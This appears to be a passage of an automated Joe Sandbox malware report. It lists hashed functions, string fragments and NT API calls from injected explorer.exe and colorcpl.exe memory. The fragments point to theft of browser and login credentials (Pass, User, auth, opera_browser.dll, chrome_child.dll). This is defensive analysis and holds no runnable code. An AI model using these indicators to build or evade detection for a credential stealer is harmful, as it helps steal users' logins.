Source File: 00000002.00000002.7562038018.0000000002E20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e20000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: 458f3b30d8b801f2058040df15cbad14dc4bc9a0418e9466233971cba102aee2
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: 95C1A270668A194FC758EF68D455AAAF3E1FF98304F90A36E984EC7254DF30DA01CB85

Uniqueness

Uniqueness Score: -1.00%

Function 02E4DCD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

word, xrefs: 02E4DD9E
name, xrefs: 02E4DDB2
L: , xrefs: 02E4DD66
2, xrefs: 02E4DDE1
Pass, xrefs: 02E4DD97
User, xrefs: 02E4DDAB
UR, xrefs: 02E4DD5F

Memory Dump Source

Source File: 00000002.00000002.7562038018.0000000002E20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e20000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: cbf03aa6e3a9dcc8bcc0b75e1c291f4c2fdcc763ced5e5c5952053f89161ae09
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: AAA1A1706287588FDB18EFA8D4447EEB7E2FF84304F40962DE88AD7251EF7095458B85

Uniqueness

Uniqueness Score: -1.00%

Function 02E4DCE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

word, xrefs: 02E4DD9E
name, xrefs: 02E4DDB2
L: , xrefs: 02E4DD66
2, xrefs: 02E4DDE1
Pass, xrefs: 02E4DD97
User, xrefs: 02E4DDAB
UR, xrefs: 02E4DD5F

Memory Dump Source

Source File: 00000002.00000002.7562038018.0000000002E20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e20000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: c7c061595b5d9d869b9d4f5a09cf1beeefa88fa59a97fce36c897ee3a196fddc
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: DF9191706187588FDB28EFA8D4447EEB7E2FF88304F40962DE88AD7251EF7095458B85

Uniqueness

Uniqueness Score: -1.00%

Function 02E4D352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

e, xrefs: 02E4D48E
n, xrefs: 02E4D3E7
., xrefs: 02E4D3B0
, xrefs: 02E4D47C
v, xrefs: 02E4D4A0

Memory Dump Source

Source File: 00000002.00000002.7562038018.0000000002E20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e20000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: 0bd240f9ab29c31a503c6df1693dbfcb7690a8ae4609e5aab7d76ca75da89f26
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: 8371C431658B498FD758EFA8D4847AAB7F1FF98304F00562EE84AC7261EF70D9458B81

Uniqueness

Uniqueness Score: -1.00%

Function 02E48C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

2.dl, xrefs: 02E48C64
ole3, xrefs: 02E48C5D
shel, xrefs: 02E48C90
dll, xrefs: 02E48C9E
l32., xrefs: 02E48C97

Memory Dump Source

Source File: 00000002.00000002.7562038018.0000000002E20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e20000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: d636f0eaaa3461ab67f35eb91aeb6e11c3dfd3090f7263f1dffed038b0f1fdca
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 5B515EB0958B4C8FDB54EFA4C044AEEB7F1FF58300F40562EA99AE7254EF7095418B89

Uniqueness

Uniqueness Score: -1.00%

Function 02E4986F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

dll, xrefs: 02E498F4
4, xrefs: 02E499E9
\, xrefs: 02E499E0
ion., xrefs: 02E498EC
vers, xrefs: 02E498E4

Memory Dump Source

Source File: 00000002.00000002.7562038018.0000000002E20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e20000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: fa73d28a6d9980b267e3946602719c73bae3bf6ab044a256eaa65302925ceaba
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: 01418630258B488FCB75EF2898457EBB3E5FB99305F40962E984EC7245DF30D5458782

Uniqueness

Uniqueness Score: -1.00%

Function 02E4B4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

cli., xrefs: 02E4B515
dll, xrefs: 02E4B51C
user, xrefs: 02E4B4D3
32.d, xrefs: 02E4B4DA
sspi, xrefs: 02E4B50E

Memory Dump Source

Source File: 00000002.00000002.7562038018.0000000002E20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e20000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: f80b816cb4dd79ff26962ea1e008396fe7fc9347f4e0a8af7730ebbdcdd35cea
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: B1417E30A58E0D8FCB58EF6890957ADB3E2FB68308F44956EA80ED7240DE75C5408B86

Uniqueness

Uniqueness Score: -1.00%

Function 02E49432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

el32, xrefs: 02E49537
.dll, xrefs: 02E4953F
kern, xrefs: 02E4952A
h, xrefs: 02E4951F

Memory Dump Source

Source File: 00000002.00000002.7562038018.0000000002E20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e20000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: 1427e6a2ca684bd611806bf44b9084824e2ed2c55879507f8ea7451ea2f00d6f
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: F4418E70648B488FD7A8DF28D0843ABB7E1FB98304F209A6E959EC3256DF70C545CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02E500B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

Snif, xrefs: 02E50154
f fr, xrefs: 02E5013D
om:, xrefs: 02E50146
, xrefs: 02E50184

Memory Dump Source

Source File: 00000002.00000002.7562038018.0000000002E20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e20000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 3e3b6c3ead95588823f8b8f7fe2af2b7bc69dc74af2f611b54263eb46e9da365
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: 3D31C17151CB886FD71AEB68C4846DAB7D5FB84300F90991EE89BC7291EE30A549CF43

Uniqueness

Uniqueness Score: -1.00%

Function 02E500C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

Snif, xrefs: 02E50154
f fr, xrefs: 02E5013D
om:, xrefs: 02E50146
, xrefs: 02E50184

Memory Dump Source

Source File: 00000002.00000002.7562038018.0000000002E20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e20000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: df043e776a58044ea20df1e47280089ac32527d9927c862409b01f016764516b
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: D931E071528B486FD719EF28C4846EAB7D5FB94300F90891EE89BC3291EE30A546CF43

Uniqueness

Uniqueness Score: -1.00%

Function 02E4BFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

me_c, xrefs: 02E4BFEE
.dll, xrefs: 02E4BFFE
chro, xrefs: 02E4C023
hild, xrefs: 02E4BFF6

Memory Dump Source

Source File: 00000002.00000002.7562038018.0000000002E20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e20000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: cdf8df3aa22787eb237ff651db559f681dd34d8b920b825a56266b064a5af0d1
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: DA31A470158B184FC784EF689494BAAB7E2FF98304F94A52DA84ECB214DF30D545CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02E4BFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

me_c, xrefs: 02E4BFEE
.dll, xrefs: 02E4BFFE
chro, xrefs: 02E4C023
hild, xrefs: 02E4BFF6

Memory Dump Source

Source File: 00000002.00000002.7562038018.0000000002E20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e20000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: bec04d30f85528fc94e36a15888bedd520ffd8d12c48e859dfb35c3197dae095
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: 49319270158B184FC784EF689494BAAB7E2FF98304F94A62DA84ACB255DF30C545CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02E4E8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

nt: , xrefs: 02E4E91E
urlmon.dll, xrefs: 02E4E959
User-Agent: , xrefs: 02E4E935, 02E4E948
on.d, xrefs: 02E4E902

Memory Dump Source

Source File: 00000002.00000002.7562038018.0000000002E20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e20000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 83fc995c3c2035787cf47ea15866a8e3fbe25dbb0d56a7060feb558b714e8142
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: DA31C031654A1D8FCB44EFA8C8847EDB7E2FF58204F40522AE84ED7250DF7486458B89

Uniqueness

Uniqueness Score: -1.00%

Function 02E4E8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

nt: , xrefs: 02E4E91E
urlmon.dll, xrefs: 02E4E959
User-Agent: , xrefs: 02E4E935, 02E4E948
on.d, xrefs: 02E4E902

Memory Dump Source

Source File: 00000002.00000002.7562038018.0000000002E20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e20000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: d4aa66cba982d294cc3684133c1087da56c07f9907d360bb23fff09eebe1e93c
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: B921E670A60A5D8FCB44EFA8C8447EDBBE2FF58304F80921AE85AD7250DF748645CB85

Uniqueness

Uniqueness Score: -1.00%

Function 02E4FE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 02E4FF26
l, xrefs: 02E4FF03
., xrefs: 02E4FF1F
t, xrefs: 02E4FEF4

Memory Dump Source

Source File: 00000002.00000002.7562038018.0000000002E20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e20000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: 68be179cfa0005fe0c57db189e482c4d680b4f111c9f93a69f8a1b59e74174c6
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: CF217F70A64A1D9BDB48EFA8D0447EEBBF1FF18314F90962DE449D3600DB749551CB84

Uniqueness

Uniqueness Score: -1.00%

Function 02E4FE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 02E4FF26
l, xrefs: 02E4FF03
., xrefs: 02E4FF1F
t, xrefs: 02E4FEF4

Memory Dump Source

Source File: 00000002.00000002.7562038018.0000000002E20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e20000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: 85e278d3439993aa4d185bd309bd404b68c118db635171b91b124adf1bece7cc
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: BD217C70A64A0E9BDB48EFA8D0447AEBBF1FF18304F90962EE409D3610DB7495918B84

Uniqueness

Uniqueness Score: -1.00%

Function 02E4FFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

pass, xrefs: 02E50022
auth, xrefs: 02E5002F
logi, xrefs: 02E5003C
user, xrefs: 02E50015

Memory Dump Source

Source File: 00000002.00000002.7562038018.0000000002E20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e20000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: db6513e276a773e860eadd8828e4943cef8be3c0b7a8777d4084e676e9ff68d6
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: 9121C030624B0D8BCB05DF9998807EEB7F2EF88344F009619E80ADB244D7B0D9558BC2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: colorcpl.exePID: 5700, Parent PID: 4836COMMON

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	2%
Signature Coverage:	0%
Total number of Nodes:	593
Total number of Limit Nodes:	71

Executed Functions

Function 0015A34A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00154BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00154BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0015A39D

Strings

.z`, xrefs: 0015A38D, 0015A398

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 0730cd2aaa76f97af82fbb43258cbec149c291d9dc640adf8199242e04b6f1e7
Instruction ID: 6a8cfe97b68777b1b223d5e96cedf04457da9fe60b22a480304bc71d96e9a5ed
Opcode Fuzzy Hash: 0730cd2aaa76f97af82fbb43258cbec149c291d9dc640adf8199242e04b6f1e7
Instruction Fuzzy Hash: 2401B2B6245508BFCB08CF98DC95EEB37A9AF8C754F158248BA1DD7241C630EC118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0015A350 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00154BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00154BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0015A39D

Strings

.z`, xrefs: 0015A38D, 0015A398

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 75639b7369ea4a68a91297310ec983101ab11c21525b8f19a9a86306900e480e
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 26F0BDB2200208AFCB08CF88DC85EEB77ADAF8C754F158248BA1D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0015A3FA Relevance: 1.6, APIs: 1, Instructions: 73
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(00154D62,5EB65239,FFFFFFFF,00154A21,?,?,00154D62,?,00154A21,FFFFFFFF,5EB65239,00154D62,?,00000000), ref: 0015A445

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 2362ee5102aaec1c744eb77fd13eaa93d60ede62897ea6bda6f6c55bb3082f76
Instruction ID: 8c99227f754f6b4033a44283ded64f3fbcad368cab0897e6ac583b875e5d6cde
Opcode Fuzzy Hash: 2362ee5102aaec1c744eb77fd13eaa93d60ede62897ea6bda6f6c55bb3082f76
Instruction Fuzzy Hash: 952118B6210049AFCB18DF99D890CEB77A9FF8C314B158789FD5C97212C234E8558BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0015A400 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00154D62,5EB65239,FFFFFFFF,00154A21,?,?,00154D62,?,00154A21,FFFFFFFF,5EB65239,00154D62,?,00000000), ref: 0015A445

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 9ec2e533d34164859049ee631e713fe09422888f228b53f231115e99402b5319
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 05F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0015A530 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00142D11,00002000,00003000,00000004), ref: 0015A569

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: bcaafaef906e7c9bbc9f8fb056bac45a3ff8a3f1e7756de3df92f9325faa4095
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: D9F015B2200208AFCB14DF89CC81EAB77ADAF8C754F118249BE1C97241C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0015A52A Relevance: 1.5, APIs: 1, Instructions: 29memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00142D11,00002000,00003000,00000004), ref: 0015A569

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 9ff77a714a7c0f0050e8463b2884c14b645466c7b3a324d10e9db52095d13bd2
Instruction ID: 7ed94779836dedbf942438660101c0740fad804be6c360df515cebe25c46a0ee
Opcode Fuzzy Hash: 9ff77a714a7c0f0050e8463b2884c14b645466c7b3a324d10e9db52095d13bd2
Instruction Fuzzy Hash: CBF01CB1100149ABDB15EF58DC84CEBBBA8FF88224B15875DFD9DA7206C631E815CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0015A480 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00154D40,?,?,00154D40,00000000,FFFFFFFF), ref: 0015A4A5

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 1c80fa584481e04de9c35abf8827558d5d1305ff424172bd666f976915e49a4b
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 3DD01776240214ABD710EB98CC85EAB7BACEF48760F154599BA6C9B242C630FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 043834E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043834EA

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 550c607536c5414a8b12668931af5c5643a715160b926f566cb71db640327034
Instruction ID: 0a37ee219749135d96667006f6277eb4fa94222f71d974fda83a7fe5d5d22ccc
Opcode Fuzzy Hash: 550c607536c5414a8b12668931af5c5643a715160b926f566cb71db640327034
Instruction Fuzzy Hash: 7890023562A10402F90471584614706104587D2245F61E855A0419568DC7B5DD5175B2

Uniqueness

Uniqueness Score: -1.00%

Function 04382C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04382C3A

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 24138be8f0345d031041141a09db3cdb9646a8f7f38f797531e2b881bbbe3ca8
Instruction ID: d3d5bfb7c0e7b43c4462a24b3ea08f01110dbd90109856b96060882cd7a36b00
Opcode Fuzzy Hash: 24138be8f0345d031041141a09db3cdb9646a8f7f38f797531e2b881bbbe3ca8
Instruction Fuzzy Hash: 1190022D23700002F9847158550860A004587D3246F91F859A000A558CC935DC696331

Uniqueness

Uniqueness Score: -1.00%

Function 04382CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04382CFA

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 13c60da4034853d54f2685ad700b727829c73ce175c49d87ccb65ea6431b9029
Instruction ID: 47067152014a387445aaa8352d6e3ffa444e44cd765d60bbd032ed91eb96bf5b
Opcode Fuzzy Hash: 13c60da4034853d54f2685ad700b727829c73ce175c49d87ccb65ea6431b9029
Instruction Fuzzy Hash: 30900225267041527D49B1584504507404697E2285791E456A1409950CC536EC56E631

Uniqueness

Uniqueness Score: -1.00%

Function 04382D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04382D1A

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9991cced3fc0db2c8e4fdfaa5586f0f35959442d9804baeb844387004d4d376b
